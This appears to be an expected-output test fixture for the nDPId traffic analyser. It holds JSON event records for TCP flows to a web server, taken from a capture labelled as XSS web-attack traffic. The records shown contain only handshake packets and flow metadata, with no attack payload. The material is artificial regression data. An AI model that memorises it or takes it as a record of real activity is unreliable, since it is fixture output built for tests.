+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":1499347588270,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347588270,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nX9AAD4GKFGsEAABwKgKMuWuAFBMCdiIAAAAAKACchANQQAAAgQFtAQCCAoBO0X3AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":2,"flow_last_seen":1499347588270,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347588270,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5a7qCbUZTAnYiaAScSBTqgAAAgQFtAQCCAoD5RdtATtF9wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5183,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":3,"flow_last_seen":1499347588271,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347588271,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nYBAAD4GKFisEAABwKgKMuWuAFBMCdiJ6gm1GoAQAOXysAAAAQEICgE7RfgD5Rdt"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347589555,"flow_last_seen":1499347589555,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347589555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":1,"flow_last_seen":1499347589555,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347589555,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QWlAAD4GhGesEAABwKgKMuW8AFCYtAZQAAAAAKACchCRfgAAAgQFtAQCCAoBO0c5AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5193,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":2,"flow_last_seen":1499347589555,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347589555,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5bxlqZ52mLQGUaAScSBxqgAAAgQFtAQCCAoD5RiuATtHOQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5194,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":3,"flow_last_seen":1499347589557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347589557,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QWpAAD4GhG6sEAABwKgKMuW8AFCYtAZRZamed4AQAOUQsgAAAQEICgE7RzkD5Riu"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5213,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347592060,"flow_last_seen":1499347592060,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347592060,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58838,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5213,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":1499347592060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347592060,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gghAAD4GQ8isEAABwKgKMuXWAFA6JsujAAAAAKACchAoLQAAAgQFtAQCCAoBO0mrAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5214,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":2,"flow_last_seen":1499347592060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347592060,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5dZ5GzqJOibLpKAScSBWYgAAAgQFtAQCCAoD5RsgATtJqwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5215,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":3,"flow_last_seen":1499347592061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347592061,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gglAAD4GQ8+sEAABwKgKMuXWAFA6JsukeRs6ioAQAOX1aQAAAQEICgE7SasD5Rsg"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347593330,"flow_last_seen":1499347593330,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347593330,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":1499347593330,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347593330,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8X5xAAD4GZjSsEAABwKgKMuXkAFAOABV0AAAAAKACchAJOAAAAgQFtAQCCAoBO0roAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":2,"flow_last_seen":1499347593330,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347593330,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5eQdKIqzDgAVdaAScSBB+AAAAgQFtAQCCAoD5RxeATtK6AEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":3,"flow_last_seen":1499347593331,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347593331,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0X51AAD4GZjusEAABwKgKMuXkAFAOABV1HSiKtIAQAOXg\/gAAAQEICgE7SukD5Rxe"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347594595,"flow_last_seen":1499347594595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347594595,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":1499347594595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347594595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80FRAAD4G9XusEAABwKgKMuXyAFCOVJxwAAAAAKACchAAnQAAAgQFtAQCCAoBO0wkAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":2,"flow_last_seen":1499347594595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347594595,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5fJ5A+8AjlSccaAScSB3+AAAAgQFtAQCCAoD5R2aATtMJAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5237,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":3,"flow_last_seen":1499347594597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347594597,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00FVAAD4G9YKsEAABwKgKMuXyAFCOVJxxeQPvAYAQAOUW\/wAAAQEICgE7TCUD5R2a"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347597121,"flow_last_seen":1499347597121,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58892,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":1,"flow_last_seen":1499347597121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347597121,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Xm5AAD4GZ2KsEAABwKgKMuYMAFDbqxDyAAAAAKACchA8MgAAAgQFtAQCCAoBO06cAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5254,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":2,"flow_last_seen":1499347597121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347597121,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5gw3EDJr26sQ86AScSCvnwAAAgQFtAQCCAoD5SARATtOnAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5255,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":3,"flow_last_seen":1499347597122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347597122,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Xm9AAD4GZ2msEAABwKgKMuYMAFDbqxDzNxAybIAQAOVOpwAAAQEICgE7TpwD5SAR"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347462759,"flow_last_seen":1499347468740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347462759,"flow_last_seen":1499347468740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347465304,"flow_last_seen":1499347470740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57480,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347465304,"flow_last_seen":1499347470740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347466553,"flow_last_seen":1499347471741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57494,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347466553,"flow_last_seen":1499347471741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347467793,"flow_last_seen":1499347473742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347467793,"flow_last_seen":1499347473742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347469060,"flow_last_seen":1499347474742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57522,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347469060,"flow_last_seen":1499347474742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347470328,"flow_last_seen":1499347475742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347470328,"flow_last_seen":1499347475742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347471594,"flow_last_seen":1499347476742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57550,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347471594,"flow_last_seen":1499347476742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57550,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347598383,"flow_last_seen":1499347598383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347598383,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":1,"flow_last_seen":1499347598383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347598383,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jLdAAD4GORmsEAABwKgKMuYaAFCJpsNgAAAAAKACchDafwAAAgQFtAQCCAoBO0\/XAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":2,"flow_last_seen":1499347598383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347598383,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5hrRW5D8iabDYaAScSBT1AAAAgQFtAQCCAoD5SFNATtP1wEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5268,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":3,"flow_last_seen":1499347598385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347598385,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jLhAAD4GOSCsEAABwKgKMuYaAFCJpsNh0VuQ\/YAQAOXy2gAAAQEICgE7T9gD5SFN"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347599663,"flow_last_seen":1499347599663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347599663,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":1499347599663,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347599663,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qjVAAD4GG5usEAABwKgKMuYoAFAgjfstAAAAAKACchAKfQAAAgQFtAQCCAoBO1EYAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":2,"flow_last_seen":1499347599663,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347599663,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5igR\/+x3II37LqAScSDmcgAAAgQFtAQCCAoD5SKNATtRGAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5279,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":3,"flow_last_seen":1499347599664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347599664,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qjZAAD4GG6KsEAABwKgKMuYoAFAgjfsuEf\/seIAQAOWFegAAAQEICgE7URgD5SKN"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347602223,"flow_last_seen":1499347602223,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347602223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":1499347602223,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347602223,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZzNAAD4GXp2sEAABwKgKMuZCAFA0xTSkAAAAAKACchC6NQAAAgQFtAQCCAoBO1OXAAAAAAEDAwc="} 